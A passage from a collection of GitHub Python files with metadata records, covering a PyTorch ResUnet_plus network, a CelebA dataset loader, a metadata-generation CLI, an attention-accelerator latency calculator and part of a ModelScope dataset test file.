out_channels):\r\n super(BridgeConv, self).__init__()\r\n\r\n # number of input channels is a number of filters in the previous layer\r\n # number of output channels is a number of filters in the current layer\r\n # \"same\" convolutions\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=True),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=True),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\n def forward(self, x):\r\n x = self.conv(x)\r\n return x\r\n\r\n\r\nclass UpConv(nn.Module):\r\n\r\n def __init__(self, in_channels, out_channels):\r\n super(UpConv, self).__init__()\r\n\r\n self.up = nn.Sequential(\r\n nn.UpsamplingBilinear2d(scale_factor=2),\r\n nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=True),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\n def forward(self, x):\r\n x = self.up(x)\r\n return x\r\n\r\n\r\nclass Upsample(nn.Module):\r\n def __init__(self, input_dim, output_dim, kernel, stride, padding):\r\n super(Upsample, self).__init__()\r\n\r\n self.upsample = nn.ConvTranspose2d(\r\n input_dim, output_dim, kernel_size=kernel, stride=stride, padding=padding) \r\n\r\n def forward(self, x):\r\n return self.upsample(x)\r\n\r\n\r\nclass ResUnet_plus(nn.Module):\r\n def __init__(self, img_ch=3, output_ch=1):\r\n super(ResUnet_plus, self).__init__()\r\n\r\n self.encoder0 = ResidualStem(input_dim = img_ch, output_dim = 64)\r\n\r\n self.encoder1 = ResidualBlock(input_dim = 64, output_dim = 128)\r\n\r\n self.encoder2 = ResidualBlock(input_dim = 128, output_dim = 256)\r\n\r\n self.encoder3 = ResidualBlock(input_dim = 256, output_dim = 512)\r\n\r\n self.encoder4 = ResidualBlock(input_dim = 512, output_dim = 1024)\r\n\r\n self.encoder5 = BridgeConv(in_channels = 1024, out_channels = 2048)\r\n\r\n self.MaxPool = nn.MaxPool2d(kernel_size=3,stride=2,ceil_mode=True)\r\n\r\n self.UpConv5_4 = Upsample(2048, 1024, kernel=2, stride=2, padding=0)\r\n self.UpConv5_3 = Upsample(2048, 128, kernel=4, stride=4, padding=0)\r\n self.UpConv5_2 = Upsample(2048, 64, kernel=8, stride=8, padding=0)\r\n self.UpConv5_1 = Upsample(2048, 32, kernel=16, stride=16, padding=0)\r\n self.UpConv5_0 = Upsample(2048, 16, kernel=32, stride=32, padding=0)\r\n\r\n self.UpConv4_3 = Upsample(2048, 512, kernel=2, stride=2, padding=0)\r\n self.UpConv4_2 = Upsample(2048, 64, kernel=4, stride=4, padding=0)\r\n self.UpConv4_1 = Upsample(2048, 32, kernel=8, stride=8, padding=0)\r\n self.UpConv4_0 = Upsample(2048, 16, kernel=16, stride=16, padding=0)\r\n\r\n self.UpConv3_2 = Upsample(1152, 256, kernel=2, stride=2, padding=0)\r\n self.UpConv3_1 = Upsample(1152, 32, kernel=4, stride=4, padding=0)\r\n self.UpConv3_0 = Upsample(1152, 16, kernel=8, stride=8, padding=0)\r\n\r\n self.UpConv2_1 = Upsample(640, 128, kernel=2, stride=2, padding=0)\r\n self.UpConv2_0 = Upsample(640, 16, kernel=4, stride=4, padding=0)\r\n\r\n self.UpConv1_0 = Upsample(352, 64, kernel=2, stride=2, padding=0)\r\n\r\n\r\n self.decoder0 = nn.Sequential(\r\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(64, output_ch, kernel_size=3, stride=1, padding=1)\r\n )\r\n\r\n\r\n\r\n def forward(self, x):\r\n \r\n # print(\"input: \", list(x.size()))\r\n # Encode\r\n\r\n e0 = self.encoder0(x) # C*W*H 64*512*512\r\n\r\n maxpool0 = self.MaxPool(e0) \r\n e1 = self.encoder1(maxpool0) # C*W*H 128*256*256\r\n # print(\"encoder 1\", list(e1.size()))\r\n\r\n maxpool1 = self.MaxPool(e1) # C*W*H 128*128*128\r\n e2 = self.encoder2(maxpool1) # C*W*H 256*128*128\r\n\r\n maxpool2 = self.MaxPool(e2) # C*W*H 256*64*64\r\n e3 = self.encoder3(maxpool2) # C*W*H 512*64*64\r\n\r\n maxpool3 = self.MaxPool(e3) # C*W*H 512*32*32\r\n e4 = self.encoder4(maxpool3) # C*W*H 1024*32*32\r\n \r\n maxpool4 = self.MaxPool(e4) # C*W*H 1024*16*16\r\n e5 = self.encoder5(maxpool4) # C*W*H 2048*16*16\r\n # print(\"bridge before attention\",list(e5.size()))\r\n\r\n # Decode\r\n # print(\"bridge after attention\", list(att_x5.size()))\r\n d5_4 = self.UpConv5_4(e5) # C*W*H 1024*32*32\r\n d5_3 = self.UpConv5_3(e5) # C*W*H 128*64*64\r\n d5_2 = self.UpConv5_2(e5) # C*W*H 64*128*128\r\n d5_1 = self.UpConv5_1(e5) # C*W*H 32*256*256\r\n d5_0 = self.UpConv5_0(e5) # C*W*H 16*512*512\r\n # print(\"after decoding 5\",list(d5.size()))\r\n # print(\"after encoding 4\",list(e4.size()))\r\n\r\n d4 = torch.cat((e4, d5_4), dim=1) # C*W*H 2048*32*32\r\n d4_3 = self.UpConv4_3(d4) \r\n d4_2 = self.UpConv4_2(d4)\r\n d4_1 = self.UpConv4_1(d4)\r\n d4_0 = self.UpConv4_0(d4)\r\n\r\n\r\n d3 = torch.cat((e3, d5_3, d4_3), dim=1) # C*W*H 1152*64*64\r\n d3_2 = self.UpConv3_2(d3) \r\n d3_1 = self.UpConv3_1(d3)\r\n d3_0 = self.UpConv3_0(d3)\r\n\r\n\r\n d2 = torch.cat((e2, d5_2, d4_2, d3_2), dim=1) # C*W*H 640*128*128\r\n d2_1 = self.UpConv2_1(d2) \r\n d2_0 = self.UpConv2_0(d2) \r\n\r\n\r\n d1 = torch.cat((e1, d5_1, d4_1, d3_1, d2_1), dim=1) # C*W*H 352*256*256\r\n d0 = self.UpConv1_0(d1) \r\n\r\n output = self.decoder0(d0) # C*W*H output_ch*512*512\r\n\r\n return output\r\n", "repo_name": "TeRyZh/Reconstruction-NGSIM-Trajectory-with-DMD-and-Res_UNet_plus", "sub_path": "Res_Unet_plus/ResUnet_plus.py", "file_name": "ResUnet_plus.py", "file_ext": "py", "file_size_in_byte": 8952, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "88", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 80, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.UpsamplingBilinear2d", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 133, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 133, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 183, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 185, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 186, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 187, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 245, "usage_type": "call"}]} +{"seq_id": "20895228277", "text": "import numpy as np\n\nfrom torchvision.datasets import CelebA\n\nfrom .utils import BaseTransforms\n\n\nclass CelebADataset(CelebA):\n \"\"\"Dataset for loading CelebA images.\"\"\"\n\n def __init__(\n self,\n data_root,\n celeba_transform,\n split='train',\n ):\n if split == 'val':\n split = 'valid'\n super().__init__(\n root=data_root,\n split=split,\n target_type=[],\n transform=celeba_transform,\n target_transform=None,\n download=False,\n )\n\n def _rand_another(self):\n \"\"\"Random get another sample when encountering loading error.\"\"\"\n another_idx = np.random.choice(len(self))\n data_dict = self.__getitem__(another_idx)\n data_dict['error_flag'] = True\n return data_dict\n\n def __getitem__(self, idx):\n \"\"\"Data dict:\n - data_idx: int\n - img: [C, H, W]\n - error_flag: whether loading `idx` causes error and _rand_another\n \"\"\"\n try:\n img, _ = super().__getitem__(idx)\n except FileNotFoundError:\n return self._rand_another()\n return {\n 'data_idx': idx,\n 'img': img,\n 'error_flag': False,\n }\n\n\ndef build_celeba_dataset(params, val_only=False):\n \"\"\"Build CelebA dataset that load images.\"\"\"\n args = dict(\n data_root=params.data_root,\n celeba_transform=BaseTransforms(params.resolution),\n split='val',\n )\n if val_only:\n print('Using CelebA test set!')\n args['split'] = 'test'\n val_dataset = CelebADataset(**args)\n if val_only:\n return val_dataset\n args['split'] = 'train'\n train_dataset = CelebADataset(**args)\n return train_dataset, val_dataset\n", "repo_name": "Wuziyi616/SlotDiffusion", "sub_path": "slotdiffusion/img_based/datasets/celeba.py", "file_name": "celeba.py", "file_ext": "py", "file_size_in_byte": 1791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 50, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torchvision.datasets.CelebA", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "utils.BaseTransforms", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "6110689746", "text": "#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport logging\nimport os\nfrom collections import defaultdict\n\nfrom pydtk.io.reader import BaseFileReader\nfrom pydtk.models import MetaDataModel\nfrom pydtk.utils.utils import load_config, smart_open\n\nconfig = load_config(\"v4\").bin.make_meta\n\n\ndef make_meta_interactively(template=None):\n \"\"\"Make metadata with the interactive command.\"\"\"\n if template is None:\n template = defaultdict(dict)\n meta = defaultdict(dict)\n for key in config.common_item.keys():\n if key in template.keys():\n meta[key] = str(\n input(f\"{config.common_item[key]} [{template[key]}]: \") or template[key]\n )\n else:\n meta[key] = input(f\"{config.common_item[key]}: \")\n return meta\n\n\ndef make_meta(file, template=None):\n \"\"\"Make metadata with a template.\"\"\"\n meta = template if type(template) is dict else defaultdict(dict)\n meta[\"path\"] = file\n if \"contents\" in meta.keys():\n meta[\"contents\"] = _get_contents_info(file)\n if \"start_timestamp\" in meta.keys() and \"end_timestamp\" in meta.keys():\n meta[\"start_timestamp\"], meta[\"end_timestamp\"] = _get_timestamps_info(file)\n return meta\n\n\ndef _get_contents_info(file_path):\n \"\"\"Get contents infomation from model.\n\n Args:\n file_path (str): path to the file\n\n Returns:\n (dict): contents info\n\n \"\"\"\n metadata = MetaDataModel(data={\"path\": file_path})\n model = BaseFileReader._select_model(metadata)\n contents = model.generate_contents_meta(path=file_path)\n return contents\n\n\ndef _get_timestamps_info(file_path):\n \"\"\"Get contents infomation from model.\n\n Args:\n file_path (str): path to the file\n\n Returns:\n (list): [start_timestamp, end_timestamp]\n\n \"\"\"\n metadata = MetaDataModel(data={\"path\": file_path})\n model = BaseFileReader._select_model(metadata)\n timetamps_info = model.generate_timestamp_meta(path=file_path)\n return timetamps_info\n\n\ndef get_arguments():\n \"\"\"Parse arguments.\"\"\"\n parser = argparse.ArgumentParser(description=\"Metadata maker.\")\n parser.add_argument(\n \"-i\",\n \"--interactive\",\n action=\"store_true\",\n help=\"interactive mode\",\n )\n parser.add_argument(\n \"--template\",\n type=str,\n default=None,\n help=\"path to json has metadata template\",\n )\n parser.add_argument(\n \"--file\",\n type=str,\n default=None,\n help=\"file to make metadata\",\n )\n parser.add_argument(\n \"--out_dir\",\n type=str,\n default=None,\n help=\"output directory\",\n )\n return parser.parse_args()\n\n\ndef main():\n \"\"\"Make metadata.\"\"\"\n # set logger\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s\",\n )\n args = get_arguments()\n if args.template is not None:\n with open(args.template, \"r\") as f:\n template = json.load(f)\n else:\n template = None\n\n if args.interactive:\n meta = make_meta_interactively(template)\n meta_json = input(\"output json: \")\n else:\n if args.file is None:\n raise ValueError(\"following arguments are required: --file\")\n meta = make_meta(args.file, template)\n if args.out_dir is None:\n meta_json = None\n else:\n meta_json = os.path.join(args.out_dir, os.path.basename(args.file) + \".json\")\n\n with smart_open(meta_json, \"wt\") as f:\n json.dump(meta, f, indent=4)\n logging.info(f\"Dumped: {meta_json}\")\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "dataware-tools/pydtk", "sub_path": "pydtk/bin/make_meta.py", "file_name": "make_meta.py", "file_ext": "py", "file_size_in_byte": 3649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pydtk.utils.utils.load_config", "line_number": 13, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 19, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 20, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 33, "usage_type": "call"}, {"api_name": "pydtk.models.MetaDataModel", "line_number": 52, "usage_type": "call"}, {"api_name": "pydtk.io.reader.BaseFileReader._select_model", "line_number": 53, "usage_type": "call"}, {"api_name": "pydtk.io.reader.BaseFileReader", "line_number": 53, "usage_type": "name"}, {"api_name": "pydtk.models.MetaDataModel", "line_number": 68, "usage_type": "call"}, {"api_name": "pydtk.io.reader.BaseFileReader._select_model", "line_number": 69, "usage_type": "call"}, {"api_name": "pydtk.io.reader.BaseFileReader", "line_number": 69, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 108, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 128, "usage_type": "call"}, {"api_name": "pydtk.utils.utils.smart_open", "line_number": 130, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 131, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "777199730", "text": "import argparse\nfrom pathlib import Path\n\nimport pandas as pd\n\n\ndef calc_sanger_latency(sparsity, load_balance, seq_len):\n # Q, K, V: [seq_len, QKV_WIDTH]\n # S (original): [seq_len, seq_len]\n # S (after pack & split): [num_subrows, seq_len]\n\n TH, TW = 64, 64 # PE array: TH x TW\n NUM_PE_PER_ROW = 16\n DATA_TYPE = 2 # 16 bit, 2 Byte\n FREQUENCY = 1e9 # 1G\n REAL_BANDWIDTH = 128 # 128 GB/s\n\n QKV_WIDTH = 768\n num_subrows = sparsity / load_balance / 0.25 * seq_len # average number of subrows after pack & split\n\n LINEAR_GOPS = TH * NUM_PE_PER_ROW * 1 * 2 # pe-size * 1(GHz) * 2(ops/mac) = 2048\n PROJ_GOPS = LINEAR_GOPS / sparsity * load_balance\n \n LAT_linear = seq_len * QKV_WIDTH * QKV_WIDTH * 2 * 3 / 1e9 / LINEAR_GOPS\n LAT_project = seq_len * QKV_WIDTH * QKV_WIDTH * 2 / 1e9 / PROJ_GOPS\n\n # latency of Q_tile x K_tile\n LAT_Qt_Kt = QKV_WIDTH + TW # pipeline depth is QKV_WIDTH , TW is the access skew\n\n # latency of S_tile x V_tile\n LAT_St_Vt = num_subrows + TW # pipeline depth is QKV_HEIGHT\n\n # Latency to calculate a THxTW output using QKV\n LAT_TH_TW_output_tile = LAT_Qt_Kt + LAT_St_Vt\n\n # Latency to calculate a THxSEQUENCE_LENGTH output by changing K and V\n LAT_TH_SEQL_output_tile = LAT_TH_TW_output_tile * (seq_len / TW)\n\n # to overlap the latency, we need to read TH+TW data per cycle\n # reuse Q in buffer, stream K and V\n required_bandwidth = TW * DATA_TYPE * FREQUENCY / 1e9\n\n if required_bandwidth < REAL_BANDWIDTH:\n transfer_coeff = 1\n else:\n transfer_coeff = required_bandwidth / REAL_BANDWIDTH\n\n # final latency to calculate a THxSEQUENCE_LENGTH output\n LAT_final_TH_SEQL_output_tile = LAT_TH_SEQL_output_tile * transfer_coeff\n\n # final latency to calculate a complete output\n LAT_final = (num_subrows / TH) * LAT_final_TH_SEQL_output_tile \n\n return LAT_linear + LAT_final / FREQUENCY + LAT_project\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--sparsity\", default=None, type=float, required=False)\n parser.add_argument(\"--load_balance\", default=None, type=float, required=False)\n parser.add_argument(\"--seq_len\", default=512, type=int, required=False)\n parser.add_argument(\"--csv_file\", default=\"load_balance.csv\", type=str, required=False, \n help=\"Path to the csv file generated by gen_sparsity_mask.\")\n args = parser.parse_args()\n \n if args.sparsity is not None:\n assert args.load_balance is not None\n total_lat = calc_sanger_latency(args.sparsity, args.load_balance, args.seq_len)\n print(f\"Sanger Latency: {total_lat * 1000:.3f} ms\")\n else:\n assert Path(args.csv_file).exists(), f\"{args.csv_file} does not exist.\"\n metrics = pd.read_csv(args.csv_file).mean()\n sparsity = metrics['overall-sparsity']\n print(f\"Average Sparsity: {sparsity:.3f}\")\n for lb_key in ['50%-no-skip', '50%-skip', '25%-no-skip', '25%-skip']:\n load_balance = metrics[lb_key]\n total_lat = calc_sanger_latency(sparsity, load_balance, args.seq_len)\n print(f\"Load Balance ({lb_key}): {load_balance:.3f}\")\n print(f\"Sanger Latency ({lb_key}): {total_lat * 1000:.3f} ms\")\n\n\nif __name__ == \"__main__\":\n main()\n\n", "repo_name": "hatsu3/Sanger", "sub_path": "bench_sanger_v2.py", "file_name": "bench_sanger_v2.py", "file_ext": "py", "file_size_in_byte": 3293, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 58, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "23265850015", "text": "# Copyright (c) Alibaba, Inc. and its affiliates.\r\n\r\nimport unittest\r\n\r\nfrom modelscope.models import Model\r\nfrom modelscope.msdatasets import MsDataset\r\nfrom modelscope.preprocessors import SequenceClassificationPreprocessor\r\nfrom modelscope.preprocessors.base import Preprocessor\r\nfrom modelscope.utils.constant import DEFAULT_DATASET_NAMESPACE, DownloadMode\r\nfrom modelscope.utils.test_utils import require_tf, require_torch, test_level\r\n\r\n\r\nclass ImgPreprocessor(Preprocessor):\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n self.path_field = kwargs.pop('image_path', 'image_path')\r\n self.width = kwargs.pop('width', 'width')\r\n self.height = kwargs.pop('height', 'width')\r\n\r\n def __call__(self, data):\r\n import cv2\r\n image_path = data.get(self.path_field)\r\n if not image_path:\r\n return None\r\n img = cv2.imread(image_path)\r\n return {\r\n 'image':\r\n cv2.resize(img,\r\n (data.get(self.height, 128), data.get(self.width, 128)))\r\n }\r\n\r\n\r\nclass MsDatasetTest(unittest.TestCase):\r\n\r\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\r\n def test_movie_scene_seg_toydata(self):\r\n ms_ds_train = MsDataset.load('movie_scene_seg_toydata', split='train')\r\n print(ms_ds_train._hf_ds.config_kwargs)\r\n assert next(iter(ms_ds_train.config_kwargs['split_config'].values()))\r\n\r\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\r\n def test_coco(self):\r\n ms_ds_train = MsDataset.load(\r\n 'pets_small',\r\n namespace=DEFAULT_DATASET_NAMESPACE,\r\n download_mode=DownloadMode.FORCE_REDOWNLOAD,\r\n split='train')\r\n print(ms_ds_train.config_kwargs)\r\n assert next(iter(ms_ds_train.config_kwargs['split_config'].values()))\r\n\r\n @unittest.skipUnless(test_level() >= 1, 'skip test in current test level')\r\n def test_ms_csv_basic(self):\r\n ms_ds_train = MsDataset.load(\r\n 'clue', subset_name='afqmc',\r\n split='train').to_hf_dataset().select(range(5))\r\n print(next(iter(ms_ds_train)))\r\n\r\n @unittest.skipUnless(test_level() >= 1, 'skip test in current test level')\r\n def test_ds_basic(self):\r\n ms_ds_full = MsDataset.load(\r\n 'xcopa', subset_name='translation-et', namespace='damotest')\r\n ms_ds = MsDataset.load(\r\n 'xcopa',\r\n subset_name='translation-et',\r\n namespace='damotest',\r\n split='test')\r\n print(next(iter(ms_ds_full['test'])))\r\n print(next(iter(ms_ds)))\r\n\r\n @unittest.skipUnless(test_level() >= 1, 'skip test in current test level')\r\n @require_torch\r\n def test_to_torch_dataset_text(self):\r\n model_id = 'damo/nlp_structbert_sentence-similarity_chinese-tiny'\r\n nlp_model = Model.from_pretrained(model_id)\r\n preprocessor = SequenceClassificationPreprocessor(\r\n nlp_model.model_dir,\r\n first_sequence='premise',\r\n second_sequence=None,\r\n padding='max_length')\r\n ms_ds_train = MsDataset.load(\r\n 'xcopa',\r\n subset_name='translation-et',\r\n namespace='damotest',\r\n split='test')\r\n pt_dataset = ms_ds_train.to_torch_dataset(preprocessors=preprocessor)\r\n import torch\r\n dataloader = torch.utils.data.DataLoader(pt_dataset, batch_size=5)\r\n print(next(iter(dataloader)))\r\n\r\n @unittest.skipUnless(test_level() >= 1, 'skip test in current test level')\r\n @require_tf\r\n def test_to_tf_dataset_text(self):\r\n import tensorflow as tf\r\n tf.compat.v1.enable_eager_execution()\r\n model_id = 'damo/nlp_structbert_sentence-similarity_chinese-tiny'\r\n nlp_model = Model.from_pretrained(model_id)\r\n preprocessor = 